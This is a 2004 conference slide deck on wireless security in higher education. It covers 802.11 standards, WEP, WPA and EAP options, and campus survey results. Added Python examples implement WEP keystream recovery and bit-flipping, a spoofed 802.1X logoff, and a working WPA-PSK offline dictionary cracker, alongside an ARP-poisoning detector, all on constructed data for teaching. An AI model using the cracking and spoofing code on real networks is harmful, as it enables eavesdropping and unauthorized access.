Effective Practices in Wireless Security for Higher Ed

Effective Practices
Working Group
EDUCAUSE 2004 Annual Conference
Wednesday Oct 20, 2004, 2:15p-3:05p - Track 3 Session
Meeting Room 605 - Denver Colorado Convention Center
Effective Practices in Wireless Security for Higher Ed
H. Morrow Long, CISSP, CISM
Director - Information Security
Yale University
Copyright Notice
Copyright H. Morrow Long 2004. This work is the intellectual property of the author. Permission is granted for this material to be shared for noncommercial, educational purposes, provided that this copyright statement appears on the reproduced materials and notice is given that the copying is by permission of the author. To disseminate otherwise or to republish requires written permission from the author.
The Problem?
Yahoo Map! Of Yale
Yale Central & Science Campus Wireless Map
http://www.wifimaps.com/
Yale Medical Campus Wireless Map
http://www.intel.com/ca/personal/do_more/wireless/stories/bondar.htm
With more than 50 speaking engagements a year
throughout North America and a career as a photographer
that takes her around the world, Bondar, who was chosen
to participate in the prestigious Women of Influence
speakers series, carries her notebook PC, equipped with
Intel® Centrino™ mobile technology+, everywhere she
goes. On a recent visit to Yale University in Connecticut,
Bondar says, "I used it on hospital rounds with
neurosurgery residents." This is not your father's
notebook, distinguished solely by portability. The built-in
wireless technology allows unprecedented freedom.+
Among its attributes are mobility, of course, enhanced by a
thin profile and lightweight components, longer battery life
and uncompromised performance. A user within range of a
wireless local area network (WLAN), or hotspot, has
immediate high-speed access to the Internet and e-mail
and can download or send text, data and graphics with
ease. "Even five years ago," says Bondar, "wireless
technology would have made a huge difference to my life."
WLAN Network Security Terminology Definitions
• VPN
• Supranet
• Internet
• internet
• intranet
• extranet
• ISP
• Firewall
• WEP
• SSL / TLS
• Access Point
• NAT Router
• Bridge
• Encryption
• Authentication
• PKI
• LDAP
• “Certificate”
Wireless Data – Terminology Definition
• IEEE 802.11a
• IEEE 802.11b
• IEEE 802.1X
• IEEE 802.11e
• IEEE 802.11g
• IEEE 802.11i
• Bluetooth
• HomeRF
• Jini
• EAP
• LEAP
• PEAP
• EAP over TLS
• TTLS
• WiFi
• WPA
802.11 Wireless Standards
802.11 – 1 to 2 megabits/second.
802.11b – From 1 up to 11 megabits/second.
• Conflicts with frequency band used by Bluetooth.
802.11a – supports data rates of 6, 12, 24, 36, 48 and 54 Mbps.
802.11e – multimedia & QoS improvements, security?
802.11g – 22Mbps and up to 54Mbps.
802.1X – Authentication & port access control for all 802 LANs.
WPA – 802.1X + EAP + TKIP + MIC.
802.11i – WPA plus AES (Advanced Encryption Standard).
802.11 Generic MAC layer - IBSS
IBSS (Independent Basic Service Set) AKA “Ad-hoc” network.
Stations associate directly with each other without an AP.
No relaying, only direct (peer to peer).
802.11 Generic MAC layer - BSS
BSS (Basic Service Set) - AP plus stations. AKA “Infrastructure” network.
Stations need the AP to communicate with each other and/or to relay packets out to the Internet.
SSID may be broadcast via beacon frames.
“Association” Request sent by client station to AP. Handshake to set up association may involve authentication.
“Disassociate” Request may be sent at end of session (or may not be sent at all if station shuts down or moves out of range).
802.11 Generic MAC layer - ESS
ESS (Extended Service Set) - Multiple APs (each with multiple stations) connected (via wireless or wired LAN). AKA Extended “Infrastructure” network.
ESS == Set of BSSs connected via a distribution system (DS). Shared SSID.
APs communicate among themselves.
Entire WLAN is a single MAC layer 2 net.
Station mobility within ESS. AP handoff.
802.11 PHY Specs
802.11 PHY   Max Data Rate   Frequency      Modulation
802.11       2Mb/s           2.4GHz & IR    FHSS/DSSS
802.11b      11Mb/s          2.4GHz         DSSS
802.11g      22-54Mb/s       2.4GHz         OFDM
Super-G      108Mb/s         2.4GHz         OFDM
802.11a      54Mb/s          5GHz           OFDM
802.11b (WECA -> WiFi) & g
Most popular wireless LAN (WLAN).
11 separate channels in 2.4GHz - overlapping bands of frequencies.
Channels 1, 6 and 11 are commonly used as this allows three non-overlapping channels.
802.11a
Less popular wireless LAN (WLAN).
8 non-overlapping channels in the 5GHz frequency range.
Was the only 54Mb/s WLAN until 802.11g, which uses 802.11b-compatible hardware, APs and frequency range.
Wireless Data Risks and Threats – What are we worried about?
Controlling Access to our Network
• Preventing intruders and disallowing anonymous access.
• Identifying and authenticating “trusted” users and devices.
• Authorization and network access control.
Confidentiality
• Preventing eavesdropping and decryption to ensure privacy.
Integrity
• Preventing tampering and session hijacking.
Availability
• Ensuring quality of service, preventing denial of service.
Wireless Security Problems
Default Passwords
Open Broadcast of SSIDs
No or weak encryption.
Lack of authentication.
Accidental & Malicious association w/rogue APs (M-I-T-M tampering possible).
Sniffing
Spoofing
Denial of Service (DoS) Attacks (Dis-association, Jamming)
Attacks from outside: Spammers & Worms
Default SSID (Service Set Identifier)
Cisco: ‘tsunami’
Linksys APs: ‘linksys’
Sent in beacon frames.
Wireless Security Problems
Network Attacks (Spoofing and Denial of Service (DoS) Attacks) -- Layers 1 thru 3.
Layer 1: Malicious AP overpowering a valid AP.
Layer 2: Spanning Tree packet (802.1D) attacks. Broadcasts causing loops in redundant LANs.
Layer 2: Attacks on EAP endpoints (spoofed start/logoff commands, bogus connect/failure msgs).
Layer 3: ARP Cache Poisoning. Sending spoofed unsolicited ARP replies to computers to have them divert packets.
SSID Security Guidelines
Change the SSID from the vendor default.
Do not set the SSID to a secret (e.g. a password in use elsewhere) nor to anything which provides information to outsiders (e.g. company name).
Configure AP settings to not broadcast the SSID in beacon frames. (Note that this only removes the SSID from beacons; it still travels in the clear in probe responses and association requests, so treat it as a deterrent to casual association, not as an access control.)
WLAN Security Guidelines
Use WEP to deter casual eavesdropping & trespassing.
Use a VLAN & private IP subnet range outside of the corporate intranet.
Firewall the WLAN from the corporate intranet.
Require and use VPNs from stations to enter the corporate intranet.
802.11b Wireless Security Flaws
• Confidentiality - Interception / drive-by snooping
• WEP – Wired Equiv Privacy
• VPNs and App Level Crypto (SSL/TLS, SSH)
• Integrity - Impersonation
• ARP cache poisoning (spoofing wired/wireless)
• Session Hijacking
• Availability - Denial of service (DoS)
• Easy to jam with broad spectrum interference
• Some protection against electric appliances
802.11b Wireless Security Flaws
• Authentication
• MAC/Hardware Address Control
• DHCP using registered MAC/HW addresses
• Firewall plus VPN approach
• Proprietary
• Cisco Aironet 350, Cisco driver and RADIUS
• Web-based authentication
• Authorization - Appropriate Access Control
• Access Point filters, NAT routers and Firewalls
• Accounting
- Public 802.11b ISPs! Credit Cards.
802.11b Wireless Security Flaws
802.11b has been criticized by UC Berkeley ISAAC group researchers as flawed:
http://www.isaac.cs.berkeley.edu/isaac/wep-faq.html
At least one public domain program is now available on the Internet which will sniff WEP traffic and brute force / reverse engineer the static key being used for encryption. Therefore WEP by itself is no longer considered secure enough to protect 802.11b traffic.
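The weaknesses behind that conclusion are structural rather than implementation bugs: a 24-bit IV that is sent in the clear and repeats (so RC4 keystreams get reused) and an unkeyed CRC-32 integrity value that is linear (so ciphertext can be altered and the check repaired). The following is an added example, not code from the talk or from any WEP implementation: it reproduces the 802.11-1999 WEP framing (3-byte IV prepended to the key, CRC-32 ICV appended to the payload) and then shows, from the attacker's side, plaintext recovery under a reused IV, an undetected bit flip, and the birthday bound on IV reuse. The key, IV and frame contents are constructed for the demonstration; the attacker functions never see the key.

```python
import math
import struct
import zlib


def rc4_keystream(key: bytes, n: int) -> bytes:
    """Plain RC4 (KSA then PRGA). WEP seeds it with IV || key and no other mixing."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    while len(out) < n:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(msg: bytes) -> bytes:
    """WEP integrity check value: an unkeyed CRC-32 of the plaintext, little-endian."""
    return struct.pack("<I", zlib.crc32(msg) & 0xFFFFFFFF)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, msg: bytes) -> bytes:
    """Frame body = IV || ((msg || ICV) xor RC4(IV || key)). The IV is sent in the clear."""
    assert len(iv) == 3
    body = msg + icv(msg)
    return iv + xor(body, rc4_keystream(iv + key, len(body)))


def wep_decrypt(key: bytes, frame: bytes):
    """Return (msg, icv_ok); a receiver accepts the frame only when icv_ok is True."""
    iv, body = frame[:3], frame[3:]
    plain = xor(body, rc4_keystream(iv + key, len(body)))
    msg, tag = plain[:-4], plain[-4:]
    return msg, tag == icv(msg)


def recover_via_iv_reuse(frame_a: bytes, known_msg_a: bytes, frame_b: bytes) -> bytes:
    """Attacker view: frame_a's plaintext is known (an ARP or DHCP packet, say) and frame_b
    carries the same IV, hence the same keystream. C_a xor P_a yields the keystream,
    which strips frame_b without the key, for as many bytes as frame_a was long."""
    assert frame_a[:3] == frame_b[:3], "attack needs a repeated IV"
    keystream = xor(frame_a[3:], known_msg_a + icv(known_msg_a))
    return xor(frame_b[3:], keystream)


def flip_bits_undetected(frame: bytes, delta: bytes) -> bytes:
    """Attacker view: CRC-32 is affine, so crc(m xor d) = crc(m) xor crc(d) xor crc(0..0).
    Xoring delta into the ciphertext and the matching correction into the encrypted ICV
    produces a frame that still passes the receiver's integrity check."""
    body = frame[3:]
    msg_len = len(body) - 4
    delta = delta.ljust(msg_len, b"\x00")
    icv_fix = (zlib.crc32(delta) ^ zlib.crc32(bytes(msg_len))) & 0xFFFFFFFF
    return frame[:3] + xor(body, delta + struct.pack("<I", icv_fix))


def iv_collision_probability(frames: int, iv_bits: int = 24) -> float:
    """Birthday bound: probability that some IV repeats among `frames` random IVs."""
    return 1.0 - math.exp(-frames * (frames - 1) / (2.0 * 2 ** iv_bits))


if __name__ == "__main__":
    key = bytes.fromhex("0102030405")     # constructed 40-bit WEP key (never recovered below)
    iv = b"\x11\x22\x33"                   # constructed IV that a careless card reuses
    known = b"GET /index.html "            # frame whose plaintext the attacker can guess
    secret = b"secret=hunter2"             # frame the attacker wants to read and alter
    fa, fb = wep_encrypt(key, iv, known), wep_encrypt(key, iv, secret)
    print(recover_via_iv_reuse(fa, known, fb)[: len(secret)])
    forged = flip_bits_undetected(fb, bytes(13) + b"\x01")   # turns the trailing '2' into '3'
    print(wep_decrypt(key, forged))
    print(round(iv_collision_probability(5000), 2))
```

With random IVs a busy AP crosses a 50% chance of a repeated IV after roughly five thousand frames, and many cards of the period simply counted the IV up from zero on every reset, so reuse was the norm rather than the exception. Neither attack touches the key, which is why longer keys ("128 bit WEP") do not help against them.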
802.11b Wireless Security Flaws
802.11b Access Points and networks were demonstrated as vulnerable to ARP cache poisoning by Cigital, Inc. in September 2001.
• Wireless PCs can be impersonated / traffic redirected.
• SSH and SSL sessions can be hijacked.
• Wired hosts can be impersonated and have their traffic redirected if the access point is attached to a wired LAN.
• Other wireless LANs attached to the same wired LAN are also susceptible to ARP cache poisoning.
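The symptoms of the Cigital-style attack above, and of the Layer 3 ARP cache poisoning item on the earlier Network Attacks slide, are visible on the wire: replies that no request asked for, and an IP address suddenly claimed by a second MAC. The following is an added example, not from the talk or from any product: it decodes raw Ethernet/ARP frames and runs an arpwatch-style check over three constructed frames (a client resolving its gateway, the genuine reply, and an attacker's gratuitous reply claiming the gateway's IP). The addresses and MACs are made up.

```python
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac(s: str) -> bytes:
    return bytes.fromhex(s.replace(":", ""))


def ip(s: str) -> bytes:
    return bytes(int(o) for o in s.split("."))


def fmt_mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def fmt_ip(b: bytes) -> str:
    return ".".join(str(x) for x in b)


def build_arp(src, dst, op, sha, spa, tha, tpa) -> bytes:
    """Ethernet II frame carrying an ARP packet (used here only to construct sample traffic)."""
    eth = struct.pack("!6s6sH", mac(dst), mac(src), ETH_P_ARP)
    arp = struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, op,
                      mac(sha), ip(spa), mac(tha), ip(tpa))
    return eth + arp


def parse_arp(frame: bytes):
    """Decode the Ethernet header and the 28-byte ARP body; None if the frame is not ARP."""
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETH_P_ARP or len(frame) < 42:
        return None
    _, _, _, _, op, sha, spa, tha, tpa = struct.unpack("!HHBBH6s4s6s4s", frame[14:42])
    return {"src": fmt_mac(src), "op": op, "sha": fmt_mac(sha), "spa": fmt_ip(spa),
            "tha": fmt_mac(tha), "tpa": fmt_ip(tpa)}


class ArpWatch:
    """Tracks IP->MAC bindings seen on the segment and flags the two symptoms of cache
    poisoning: a reply nobody asked for, and a sender claiming an IP already bound to a
    different MAC. Known-good bindings (gateway, servers) can be seeded from a registration
    list so that the first claim seen is not automatically trusted."""

    def __init__(self, trusted=None):
        self.bindings = dict(trusted or {})   # ip -> mac
        self.pending = set()                  # (requester ip, target ip) awaiting a reply
        self.alerts = []

    def feed(self, frame: bytes) -> None:
        a = parse_arp(frame)
        if a is None:
            return
        if a["op"] == ARP_REQUEST:
            self.pending.add((a["spa"], a["tpa"]))
        elif a["op"] == ARP_REPLY:
            # A reply is solicited only if we saw its target ask for the sender's IP.
            if (a["tpa"], a["spa"]) in self.pending:
                self.pending.discard((a["tpa"], a["spa"]))
            else:
                self.alerts.append(("unsolicited-reply", a["spa"], a["sha"]))
        self._learn(a["spa"], a["sha"])      # both opcodes carry the sender's own binding

    def _learn(self, ip_: str, mac_: str) -> None:
        known = self.bindings.get(ip_)
        if known is None:
            self.bindings[ip_] = mac_
        elif known != mac_:
            # Keep the original binding; a poisoner's claim must not overwrite it.
            self.alerts.append(("binding-changed", ip_, known, mac_))


def sample_frames():
    """Constructed traffic: a client resolves the gateway, the gateway answers, then an
    attacker injects a gratuitous reply claiming the gateway's IP for its own MAC."""
    gw, client, attacker = "aa:bb:cc:00:00:01", "aa:bb:cc:00:00:50", "de:ad:be:ef:00:66"
    return [
        build_arp(client, BROADCAST, ARP_REQUEST, client, "10.1.1.50", "00:00:00:00:00:00", "10.1.1.1"),
        build_arp(gw, client, ARP_REPLY, gw, "10.1.1.1", client, "10.1.1.50"),
        build_arp(attacker, client, ARP_REPLY, attacker, "10.1.1.1", client, "10.1.1.50"),
    ]


if __name__ == "__main__":
    watch = ArpWatch()
    for f in sample_frames():
        watch.feed(f)
    for alert in watch.alerts:
        print(alert)
```

On a real segment the frames come from a promiscuous capture on the wired side of the AP; the check is only as good as its vantage point, which is one more reason the next slides put APs on their own VLAN behind a firewall rather than on the same broadcast domain as the wired hosts.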
802.11b Wireless Security Flaws
Denial of Service
802.11b bandwidth degrades as signal strength decreases (from 11Mb/s down to 1Mb/s in increments).
802.11b frequency band conflicts with Bluetooth, wireless microphones, microwave ovens, etc.
802.11b supports multiple channels – can be used for noise/conflict avoidance, but not really useful for security (by obscurity).
Signal can be boosted at PC end by adding an antenna.
Amplifying signal reception at the AP increases noise.
802.11b Wireless Security Flaws
Denial of Service
The recently announced CCA (Clear Channel Assessment) flaw/vulnerability in 802.11b: a crafted signal keeps the DSSS medium-busy indication asserted, so every station in range defers transmission for as long as it lasts.
See the CERT announcement and
http://www.computerworld.com/securitytopics/security/story/0,10801,93221p4,00.htm
802.11b + 802.1X Wireless Security Flaws
University of Maryland researchers: Arbaugh and Mishra
Possible weaknesses:
• Session hijacking
• Man in the Middle (MitM) attacks
802.11b Confidentiality Solutions
WEP - To secure 802.11b using WEP (Wired Equivalent Privacy) you need to (most sites don’t do these):
• Lock down MAC (physical Ethernet) addresses.
• Set a network name (non-blank & non-guessable).
• Configure a static shared secret (or set of secrets).
• Change it frequently.
• Purchase 64 or 128 bit cards & base units.
Non-WEP – Use application level cryptography (SSL, etc.)
• Use and/or require VPNs.
802.11b Integrity Solutions: Best Practices
Network Access Control (protect against ARP cache poisoning)
Don’t connect Wireless Access Points to the wired network.
Put Wireless Access Points outside the corporate firewall.
Firewalling/filtering/blocking WLANs.
Use NAT Router / Firewall Wireless Access Points.
Use VLANs between wired and wireless networks.
Use Wireless VLANs to segregate.
802.11b Availability Solutions
Note that wireless networks are susceptible to DoS attacks and have very limited shared bandwidth -- THEREFORE THEY ARE NOT SUITABLE REPLACEMENTS FOR A WIRED NETWORK when you need high reliability (e.g. patient or animal subject real-time monitoring).
That said, they can be a useful part of a BCP / Disaster Recovery strategy (Sept. 11, 2001 WTC cases) in the event of a wired network failure, for Internet access.
Suitable shielding may protect internal 802.11b nets.
Intentional jamming may prevent 802.11b use… put it outside external shielding.
Use directional rather than omni-directional antennas to decrease the spread of signal and the area of reception – particularly on P2P links.
802.11b Authentication / Authorization / Accounting Solutions
Use of VPNs over Wireless LANs
• Virtual Private Networks – PPTP, L2TP, IPSEC
• Username / Password, Hardware tokens, X.509 certificates.
Proprietary
• Secure Authentication Enhancements
• Cisco Aironet 350 enhances WEP with RADIUS user authentication vs MAC address. Adds an unlimited number of WEP keys (vs. one for Apple or four for Lucent).
• Secure Web based authentication approaches
802.1X “Provides”
• Authentication (various methods)
• Port based access control
• NOT confidentiality (uses WEP)
• Can provide dynamic WEP key mgt (Cisco uses EAP to provide this)
802.11b + 802.1X “Fixes”
• Add a MAC (Message Authentication Check) to EAP and 802.11b management messages.
• Time-synchronize communications between PC and APs.
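The spoofed start/logoff attack on 802.1X endpoints listed under Layer 2 earlier, and this slide's proposed fix, can be shown side by side. The following is an added example rather than code from the talk or from any 802.1X implementation: an authenticator that honours any EAPOL-Logoff arriving from an authorized station's MAC (which is how 802.1X-2001 behaves), beside a hypothetical hardened variant in which the logoff body carries a counter and an HMAC under a key both sides hold after authentication, so forged and replayed logoffs are ignored. The MACs, the key and the layout of the authenticated logoff body are assumptions for illustration; the later 802.11w amendment took a comparable approach for deauthentication and disassociation frames.

```python
import hashlib
import hmac
import struct

ETH_P_EAPOL = 0x888E
EAPOL_START, EAPOL_LOGOFF = 1, 2


def mac(s: str) -> bytes:
    return bytes.fromhex(s.replace(":", ""))


def fmt_mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def eapol_frame(src: str, dst: str, ptype: int, body: bytes = b"") -> bytes:
    """Ethernet II + EAPOL header (version 1, packet type, body length) as in 802.1X-2001."""
    eth = struct.pack("!6s6sH", mac(dst), mac(src), ETH_P_EAPOL)
    return eth + struct.pack("!BBH", 1, ptype, len(body)) + body


def parse_eapol(frame: bytes):
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETH_P_EAPOL:
        return None
    _version, ptype, length = struct.unpack("!BBH", frame[14:18])
    return {"src": fmt_mac(src), "type": ptype, "body": frame[18:18 + length]}


class Authenticator:
    """AP-side 802.1X port control as the 2001 standard behaves: an EAPOL-Logoff whose source
    MAC is an authorized station closes that station's port, no proof of origin required.
    The EAP exchange that authorizes a station is elided; authorize() stands in for it."""

    def __init__(self):
        self.authorized = set()

    def authorize(self, sta: str) -> None:
        self.authorized.add(sta)

    def handle(self, frame: bytes):
        """Process one frame; return whether the sender's port is still authorized."""
        e = parse_eapol(frame)
        if e is None:
            return None
        if e["type"] == EAPOL_LOGOFF:
            self.authorized.discard(e["src"])
        return e["src"] in self.authorized


class HardenedAuthenticator(Authenticator):
    """The slide's fix, hypothetically applied to EAPOL-Logoff: the body must carry a counter
    and an HMAC under a key established during authentication. A forged logoff has no key;
    a replayed one has a stale counter (the counter is the 'time sync' between PC and AP)."""

    def __init__(self):
        super().__init__()
        self.keys = {}        # sta -> key established during authentication
        self.counters = {}    # sta -> highest counter accepted; survives re-authentication

    def authorize(self, sta: str, key: bytes) -> None:
        super().authorize(sta)
        self.keys[sta] = key
        self.counters.setdefault(sta, 0)

    @staticmethod
    def tag(key: bytes, src: str, counter: int) -> bytes:
        return hmac.new(key, mac(src) + struct.pack("!I", counter), hashlib.sha256).digest()[:16]

    @classmethod
    def signed_logoff(cls, src: str, dst: str, key: bytes, counter: int) -> bytes:
        """What a genuine supplicant sends: counter || HMAC(key, src || counter)."""
        body = struct.pack("!I", counter) + cls.tag(key, src, counter)
        return eapol_frame(src, dst, EAPOL_LOGOFF, body)

    def handle(self, frame: bytes):
        e = parse_eapol(frame)
        if e is None:
            return None
        sta = e["src"]
        if e["type"] == EAPOL_LOGOFF and sta in self.authorized and len(e["body"]) == 20:
            counter = struct.unpack("!I", e["body"][:4])[0]
            fresh = counter > self.counters[sta]
            genuine = hmac.compare_digest(self.tag(self.keys[sta], sta, counter), e["body"][4:])
            if fresh and genuine:
                self.counters[sta] = counter
                self.authorized.discard(sta)
        return sta in self.authorized


if __name__ == "__main__":
    STA, AP = "aa:bb:cc:00:00:50", "aa:bb:cc:00:00:01"   # constructed addresses
    plain = Authenticator()
    plain.authorize(STA)
    # The attacker only has to put the victim's MAC in the source field.
    print("unprotected port still open:", plain.handle(eapol_frame(STA, AP, EAPOL_LOGOFF)))
    hardened = HardenedAuthenticator()
    key = bytes(range(32))                                  # constructed per-session key
    hardened.authorize(STA, key)
    print("protected port still open:", hardened.handle(eapol_frame(STA, AP, EAPOL_LOGOFF)))
    print("after genuine logoff:", hardened.handle(HardenedAuthenticator.signed_logoff(STA, AP, key, 1)))
```

The unprotected authenticator cannot tell a forged logoff from a real one because nothing in the frame depends on a secret; the hardened one refuses a logoff without a valid tag, and refuses a captured valid logoff replayed after the station re-authenticates because its counter is no longer fresh.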
WPA (WiFi Protected Access)
Forward compatible with the IEEE 802.11i draft standard (except that 802.11i adds AES encryption).
EAP (Extensible Authentication Protocol)
TKIP (Temporal Key Integrity Protocol)
MIC (Message Integrity Check)
802.1X (for authentication and dynamic key exchange)
WPA Operation
WPA will provide a TKIP encryption key to both PC and AP to provide a secure session.
In the absence of an authentication server (e.g. a home or small office network) WPA will use pre-shared key (PSK) mode (a manually configured fixed password/key).
Legacy operation (old gear).
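Pre-shared key mode replaces the per-user 802.1X credential with one passphrase, and everything else needed to check a guess is in the 4-way handshake that any sniffer can capture. The following is an added example, not code from the talk: it derives the PMK from passphrase and SSID as WPA-PSK specifies (PBKDF2-HMAC-SHA1, 4096 iterations, 32 bytes), expands it to the PTK from the handshake addresses and nonces, computes the handshake MIC, and then runs the offline dictionary attack that a weak PSK allows. The addresses, nonces and EAPOL-Key body are constructed; the PMK for passphrase "password" with SSID "IEEE" matches the test vector published in the 802.11i standard.

```python
import hashlib
import hmac


def wpa_psk_to_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA-PSK mapping: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Pairwise transient key from the 4-way handshake (PRF-512 for TKIP; WPA2/CCMP uses
    PRF-384). The first 16 bytes are the KCK that keys the handshake MIC."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 64)


def eapol_mic(kck: bytes, eapol_key_frame: bytes, wpa2: bool = False) -> bytes:
    """MIC over the EAPOL-Key frame with its MIC field zeroed: HMAC-MD5 for WPA (TKIP),
    HMAC-SHA1 truncated to 16 bytes for WPA2 (CCMP)."""
    digest = hashlib.sha1 if wpa2 else hashlib.md5
    return hmac.new(kck, eapol_key_frame, digest).digest()[:16]


def crack_psk(wordlist, ssid, aa, spa, anonce, snonce, eapol_key_frame, mic, wpa2=False):
    """Offline dictionary attack. Every input except the passphrase is visible in a captured
    4-way handshake, so each guess is checked locally against the MIC of message 2."""
    for guess in wordlist:
        ptk = derive_ptk(wpa_psk_to_pmk(guess, ssid), aa, spa, anonce, snonce)
        if hmac.compare_digest(eapol_mic(ptk[:16], eapol_key_frame, wpa2), mic):
            return guess
    return None


def demo_capture():
    """Constructed handshake material: addresses, nonces and an EAPOL-Key message 2 body
    (MIC field zeroed) as a sniffer would see them, plus the MIC the genuine client sent."""
    ssid, passphrase = "IEEE", "password"
    aa, spa = bytes.fromhex("aabbcc000001"), bytes.fromhex("aabbcc000050")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    eapol_key_frame = bytes.fromhex("0103005ffe010900") + bytes(87)
    kck = derive_ptk(wpa_psk_to_pmk(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    return ssid, aa, spa, anonce, snonce, eapol_key_frame, eapol_mic(kck, eapol_key_frame)


def demo_crack(wordlist=("linksys", "admin", "password", "letmein")):
    """Run the dictionary attack against the constructed capture; returns the passphrase found."""
    ssid, aa, spa, anonce, snonce, frame, mic = demo_capture()
    return crack_psk(wordlist, ssid, aa, spa, anonce, snonce, frame, mic)


if __name__ == "__main__":
    print(wpa_psk_to_pmk("password", "IEEE").hex())
    print("recovered passphrase:", demo_crack())
```

The 4096 PBKDF2 iterations slow each guess down but do not change the picture: the attacker needs one captured handshake and then works offline at leisure, so PSK mode is only as strong as the passphrase, and a campus that hands the same passphrase to every user has effectively no per-user authentication. That is the case for the RADIUS-backed 802.1X modes on the next slide.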
Requirements for WPA
WPA AP w/TKIP & 802.1X
WPA Client w/TKIP, 802.1X & EAP “supplicant” supporting the auth method/server
Authentication server on network (e.g. RADIUS) w/strong EAP:
• TLS
• TTLS
• PEAP/LEAP
Comparison of WEP & WPA
WEP
• 40 bit static keys manually distributed
• Flawed or no authentication
WPA
• 128 bit dynamic keys automatically distributed w/ per user/session/packet keys
• 802.1X and EAP authentication
WPA2
• WPA2 is WPA plus AES (Advanced Encryption Standard). It is 802.11i compliant.
Proprietary Wireless Security
Lucent (Orinoco) - Created first features:
1. “closed network” - Don’t broadcast SSID (e.g. turn off AP broadcast ‘beacon frames’).
2. 128 bit WEP (WEP Plus - 40 bits -> 104 bits). Brings the WEP key brute-force time from days to 20 weeks (but other WEP flaws bring the time to 0).
Proprietary Wireless Security
CISCO (340/350/…) - features:
Dynamically generated short-lived (broadcast) WEP keys (in an early firmware release).
Non-Proprietary Wireless Security
MAC Address Filtering
Description: Register physical addresses of authorized devices.
Flaws:
1. Must be registered in a list in the AP or in a server (e.g. special RADIUS server).
2. Physical addresses can easily be spoofed.
Non-Proprietary Wireless Security
VPN (with or without filtering/blocking of non-VPN traffic)
Description:
Tunnel all wireless traffic through VPN sessions.
Require VPN connection to a specific VPN server.
Provides CIA (Confidentiality, Integrity & Authentication).
VPN (PPTP, L2TP, IPSEC) choice.
Potential Flaws:
1. Redundant encryption (if also using WEP).
2. Bandwidth hog / latency problem.
Non-Proprietary Wireless Security
802.1X -- Extensible Authentication Protocol
Designed for wired AND wireless LANs.
Can filter or enable ports and/or MAC addresses on switches and APs.
Not a cipher.
Not a single authentication method:
• EAP-MD5
• EAP-Cisco Wireless (aka LEAP)
• EAP-TLS (Microsoft, RFC2716)
• EAP-TTLS
• PEAP (Microsoft and Cisco)
• EAP-SIM proposal (use GSM SIM cards)
Non-Proprietary Wireless Security
802.1X -- EAP Authentication “bucket”
EAP-MD5
Description: MD5 hashing of user/pass credentials -- passed to RADIUS.
Flaws: No key management -- uses static WEP keys. Also no mutual authentication (the client cannot verify the AP or server), and the challenge/response is open to offline dictionary attack on a captured exchange.
Non-Proprietary Wireless Security
802.1X -- EAP Authentication “bucket”
EAP-CISCO WIRELESS (LEAP)
Description: Username/password credentials -- passed to RADIUS.
Benefits:
• generates one-time WEP keys for each session
• can use RADIUS timeout features to nullify current WEP attacks
• prevents rogue AP association attacks (by mutual auth requirement)
Flaws or Drawbacks:
• Needs special 802.11b driver to support LEAP
• LEAP's MS-CHAP style challenge/response can be attacked offline with a dictionary from a captured exchange, so it only holds up when user passwords are strong
Non-Proprietary Wireless Security
802.1X -- EAP Authentication “bucket”
EAP-TLS (Microsoft, RFC2716)
Description: uses X.509 certs for auth; uses SSL/TLS to pass the PKI info.
Benefits: generates one-time WEP keys for each session, à la LEAP.
Flaws or Drawbacks:
• Needs special 802.11b driver (clients). Special clients are available for some Linux distros and all non-CE Windows.
• Requires a PKI & certs. Microsoft Certificate Server and AD LDAP server can be used in an Active Directory environment.
Non-Proprietary Wireless Security
802.1X -- EAP Authentication “bucket”
PEAP (Microsoft and Cisco)
Description: Similar to EAP-TLS but uses username/password rather than client certs; uses SSL/TLS to pass the credentials.
Benefits: generates one-time WEP keys for each session, à la LEAP. PKI and user certificate are not required.
Flaws or Drawbacks:
• Needs special 802.11b driver (clients). Special clients are available -- particularly for Windows XP SP1.
Proprietary Wireless Security Systems
Aruba
BlueSocket
Ecutel
ReefEdge
Vernier
Survey
Which WLAN security modes are you using (check all that apply):
1. None
2. MAC Address Filtering
3. Application Level (SSL)
4. VPN
5. Proprietary
6. WEP
7. WPA
8. 802.1X
9. 802.11i
10. EAP
EAP Modes:
A. EAP-MD5
B. LEAP (Cisco)
C. EAP-TLS (Microsoft, RFC2716)
D. PEAP (Microsoft, Cisco)
E. Other EAP (EAP-SIM, TTLS)
[Chart: # of Respondents with WiFi Access? (Yes / No); counts not recoverable from the transcript]
[Chart: Publish Campus WiFi Information on Web? Series: SSID?, Hotspot Map? (Yes / No); counts as extracted: 9, 6, 10, 5]
[Chart: Campus WLAN Mode: IBSS 1, BSS 12, ESS 4]
[Chart: # WiFi WLAN Standards implemented (Yes / No): 802.11a, 802.11b, 802.11g, Super-G; counts as extracted: 4, 12, 15, 1, 7, 8, 0, 15]
[Chart: WiFi Encryption / Authentication Modes (Yes / No): WEP, WPA, 802.1X; counts as extracted: 10, 5, 1, 14, 7, 8]
